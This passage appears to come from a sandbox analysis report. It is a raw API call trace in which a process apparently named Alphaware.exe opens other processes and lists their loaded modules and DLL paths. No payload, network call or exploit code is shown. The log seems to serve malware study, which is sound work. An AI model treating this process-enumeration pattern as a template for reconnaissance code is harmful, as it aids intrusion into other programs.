hProcess=0x21c, hModule=0x752a0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0055.825] GetModuleInformation (in: hProcess=0x21c, hModule=0x75290000, lpmodinfo=0x264f138, cb=0x18 | out: lpmodinfo=0x264f138*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0055.826] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x75290000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0055.826] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x75290000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0055.827] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xea4) returned 0x21c [0055.827] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2651848, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2651848, lpcbNeeded=0x41eb20) returned 1 [0055.828] GetModuleInformation (in: hProcess=0x21c, hModule=0xf0000, lpmodinfo=0x2651ab8, cb=0x18 | out: lpmodinfo=0x2651ab8*(lpBaseOfDll=0xf0000, SizeOfImage=0x116000, EntryPoint=0x20200a)) returned 1 [0055.828] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xf0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="Alphaware.exe") returned 0xd [0055.828] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xf0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\Alphaware.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\alphaware.exe")) returned 0x28 [0055.828] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x2653cd0, cb=0x18 | out: lpmodinfo=0x2653cd0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.828] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.828] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.829] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef7570000, lpmodinfo=0x2655e90, cb=0x18 | out: lpmodinfo=0x2655e90*(lpBaseOfDll=0x7fef7570000, SizeOfImage=0x6f000, EntryPoint=0x7fef7571134)) returned 1 [0055.829] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef7570000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0055.829] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef7570000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\system32\\mscoree.dll")) returned 0x1f [0055.829] GetModuleInformation (in: hProcess=0x21c, hModule=0x77710000, lpmodinfo=0x2658050, cb=0x18 | out: lpmodinfo=0x2658050*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0055.829] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0055.829] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0055.830] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd910000, lpmodinfo=0x265a220, cb=0x18 | out: lpmodinfo=0x265a220*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0055.830] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0055.830] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0055.830] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff430000, lpmodinfo=0x265c448, cb=0x18 | out: lpmodinfo=0x265c448*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0055.831] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff430000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0055.831] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff430000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0055.831] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff100000, lpmodinfo=0x265e618, cb=0x18 | out: lpmodinfo=0x265e618*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0055.831] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0055.832] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0055.832] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefee80000, lpmodinfo=0x26607d8, cb=0x18 | out: lpmodinfo=0x26607d8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0055.832] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0055.832] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0055.833] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdb50000, lpmodinfo=0x2662998, cb=0x18 | out: lpmodinfo=0x2662998*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0055.833] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0055.833] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0055.834] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef4a10000, lpmodinfo=0x2664bf0, cb=0x18 | out: lpmodinfo=0x2664bf0*(lpBaseOfDll=0x7fef4a10000, SizeOfImage=0xa9000, EntryPoint=0x7fef4a11010)) returned 1 [0055.834] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef4a10000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0055.834] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef4a10000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")) returned 0x3c [0055.834] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9210000, lpmodinfo=0x2666e10, cb=0x18 | out: lpmodinfo=0x2666e10*(lpBaseOfDll=0x7fef9210000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0055.835] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9210000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="api-ms-win-core-synch-l1-2-0.DLL") returned 0x20 [0055.835] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9210000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll")) returned 0x34 [0055.835] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff2d0000, lpmodinfo=0x2669030, cb=0x18 | out: lpmodinfo=0x2669030*(lpBaseOfDll=0x7feff2d0000, SizeOfImage=0x71000, EntryPoint=0x7feff2e1e20)) returned 1 [0055.836] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0055.836] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff2d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHLWAPI.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0055.836] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff1c0000, lpmodinfo=0x266b1f0, cb=0x18 | out: lpmodinfo=0x266b1f0*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0055.837] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0055.837] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0055.838] GetModuleInformation (in: hProcess=0x21c, hModule=0x77610000, lpmodinfo=0x266d3b0, cb=0x18 | out: lpmodinfo=0x266d3b0*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0055.838] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77610000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0055.838] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77610000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0055.839] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff350000, lpmodinfo=0x266f570, cb=0x18 | out: lpmodinfo=0x266f570*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0055.839] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff350000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0055.840] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff350000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0055.840] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff690000, lpmodinfo=0x2671720, cb=0x18 | out: lpmodinfo=0x2671720*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0055.840] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff690000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0055.841] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff690000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0055.841] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff400000, lpmodinfo=0x26738e0, cb=0x18 | out: lpmodinfo=0x26738e0*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0055.842] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff400000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0055.842] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff400000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.DLL" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0055.843] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9d0000, lpmodinfo=0x2675bb8, cb=0x18 | out: lpmodinfo=0x2675bb8*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0055.843] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0055.843] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0055.844] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc940000, lpmodinfo=0x2677d78, cb=0x18 | out: lpmodinfo=0x2677d78*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0055.844] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc940000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0055.845] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc940000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0055.845] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef1bd0000, lpmodinfo=0x2679f38, cb=0x18 | out: lpmodinfo=0x2679f38*(lpBaseOfDll=0x7fef1bd0000, SizeOfImage=0xac7000, EntryPoint=0x7fef1bd63a0)) returned 1 [0055.846] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef1bd0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0055.846] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef1bd0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll")) returned 0x37 [0055.847] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef6d20000, lpmodinfo=0x267c120, cb=0x18 | out: lpmodinfo=0x267c120*(lpBaseOfDll=0x7fef6d20000, SizeOfImage=0x16000, EntryPoint=0x7fef6d2c000)) returned 1 [0055.847] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef6d20000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="VCRUNTIME140_CLR0400.dll") returned 0x18 [0055.848] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef6d20000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\VCRUNTIME140_CLR0400.dll" (normalized: "c:\\windows\\system32\\vcruntime140_clr0400.dll")) returned 0x2c [0055.848] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef4950000, lpmodinfo=0x267e320, cb=0x18 | out: lpmodinfo=0x267e320*(lpBaseOfDll=0x7fef4950000, SizeOfImage=0xbd000, EntryPoint=0x7fef49d7db0)) returned 1 [0055.849] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef4950000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ucrtbase_clr0400.dll") returned 0x14 [0055.849] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef4950000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\system32\\ucrtbase_clr0400.dll")) returned 0x28 [0055.850] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef05d0000, lpmodinfo=0x2680510, cb=0x18 | out: lpmodinfo=0x2680510*(lpBaseOfDll=0x7fef05d0000, SizeOfImage=0x15fd000, EntryPoint=0x0)) returned 1 [0055.851] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef05d0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0055.851] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef05d0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll")) returned 0x68 [0055.852] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff760000, lpmodinfo=0x2682770, cb=0x18 | out: lpmodinfo=0x2682770*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0055.852] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0055.853] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0055.854] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd670000, lpmodinfo=0x2684930, cb=0x18 | out: lpmodinfo=0x2684930*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0055.854] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd670000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0055.855] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd670000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0055.855] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef7560000, lpmodinfo=0x2686b00, cb=0x18 | out: lpmodinfo=0x2686b00*(lpBaseOfDll=0x7fef7560000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0055.856] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef7560000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="api-ms-win-core-xstate-l2-1-0.dll") returned 0x21 [0055.857] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef7560000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll")) returned 0x35 [0055.857] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef4800000, lpmodinfo=0x2688d38, cb=0x18 | out: lpmodinfo=0x2688d38*(lpBaseOfDll=0x7fef4800000, SizeOfImage=0x14f000, EntryPoint=0x7fef4801090)) returned 1 [0055.858] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef4800000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0055.859] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef4800000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clrjit.dll")) returned 0x3a [0055.859] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feef960000, lpmodinfo=0x268af30, cb=0x18 | out: lpmodinfo=0x268af30*(lpBaseOfDll=0x7feef960000, SizeOfImage=0xc6f000, EntryPoint=0x0)) returned 1 [0055.860] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feef960000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0055.861] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feef960000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_64\\system\\e43dd9c73ab5615e461bf5109c3facd6\\system.ni.dll")) returned 0x64 [0055.862] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd640000, lpmodinfo=0x268d188, cb=0x18 | out: lpmodinfo=0x268d188*(lpBaseOfDll=0x7fefd640000, SizeOfImage=0x25000, EntryPoint=0x7fefd649658)) returned 1 [0055.862] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd640000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0055.863] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd640000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SspiCli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")) returned 0x1f [0055.864] GetModuleInformation (in: hProcess=0x21c, hModule=0x779f0000, lpmodinfo=0x268f348, cb=0x18 | out: lpmodinfo=0x268f348*(lpBaseOfDll=0x779f0000, SizeOfImage=0x7000, EntryPoint=0x779f106c)) returned 1 [0055.864] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x779f0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0055.865] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x779f0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")) returned 0x1d [0055.867] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4b8) returned 0x21c [0055.867] EnumProcessModules (in: hProcess=0x21c, lphModule=0x2692288, cb=0x200, lpcbNeeded=0x41eb20 | out: lphModule=0x2692288, lpcbNeeded=0x41eb20) returned 1 [0055.871] EnumProcessModules (in: hProcess=0x21c, lphModule=0x26924a0, cb=0x400, lpcbNeeded=0x41eb20 | out: lphModule=0x26924a0, lpcbNeeded=0x41eb20) returned 1 [0055.874] GetModuleInformation (in: hProcess=0x21c, hModule=0xff760000, lpmodinfo=0x2692910, cb=0x18 | out: lpmodinfo=0x2692910*(lpBaseOfDll=0xff760000, SizeOfImage=0xb000, EntryPoint=0xff76246c)) returned 1 [0055.874] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0xff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="svchost.exe") returned 0xb [0055.874] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0xff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")) returned 0x1f [0055.875] GetModuleInformation (in: hProcess=0x21c, hModule=0x77830000, lpmodinfo=0x2694b08, cb=0x18 | out: lpmodinfo=0x2694b08*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0055.875] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77830000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0055.875] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77830000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0055.876] GetModuleInformation (in: hProcess=0x21c, hModule=0x77710000, lpmodinfo=0x2696ce0, cb=0x18 | out: lpmodinfo=0x2696ce0*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0055.876] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x77710000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0055.876] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x77710000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0055.877] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd910000, lpmodinfo=0x2698eb0, cb=0x18 | out: lpmodinfo=0x2698eb0*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0055.877] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd910000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0055.877] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd910000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0055.878] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff100000, lpmodinfo=0x269b080, cb=0x18 | out: lpmodinfo=0x269b080*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0055.878] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff100000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0055.879] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff100000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0055.879] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefee80000, lpmodinfo=0x269d298, cb=0x18 | out: lpmodinfo=0x269d298*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0055.880] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefee80000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0055.880] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefee80000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0055.881] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefdb50000, lpmodinfo=0x269f458, cb=0x18 | out: lpmodinfo=0x269f458*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0055.881] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0055.882] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefdb50000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0055.882] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff760000, lpmodinfo=0x26a1618, cb=0x18 | out: lpmodinfo=0x26a1618*(lpBaseOfDll=0x7feff760000, SizeOfImage=0x203000, EntryPoint=0x7feff783330)) returned 1 [0055.883] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff760000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0055.884] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff760000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0055.884] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff1c0000, lpmodinfo=0x26a37d8, cb=0x18 | out: lpmodinfo=0x26a37d8*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0055.885] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpBaseName=0x780780, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0055.886] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff1c0000, lpFilename=0x780780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0055.886] GetModuleInformation (in: hProcess=0x21c, hModule=0x77610000, lpmodinfo=0x26a5a30, cb=0x18 | out: lpmodinfo=0x26a5a30*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 